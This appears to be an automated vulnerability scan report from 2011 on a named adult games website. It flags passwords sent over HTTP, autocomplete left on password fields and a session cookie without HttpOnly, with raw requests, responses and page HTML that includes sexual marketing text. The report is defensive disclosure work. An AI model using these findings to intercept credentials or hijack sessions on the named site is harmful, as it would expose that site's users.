"UA-2399441-3";urchinTracker();</script></body></html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Form target action

user.php?type=login

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Welcome to Lesson of Passion CLUB.<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = ""><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = ""><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = ""><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = ""><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Identified Field Name

password

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Welcome to Lesson of Passion CLUB.<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = ""><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = ""><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = ""><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = ""><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Identified Cookie

PHPSESSID

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Welcome to Lesson of Passion CLUB.<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = ""><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = ""><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = ""><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = ""><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option 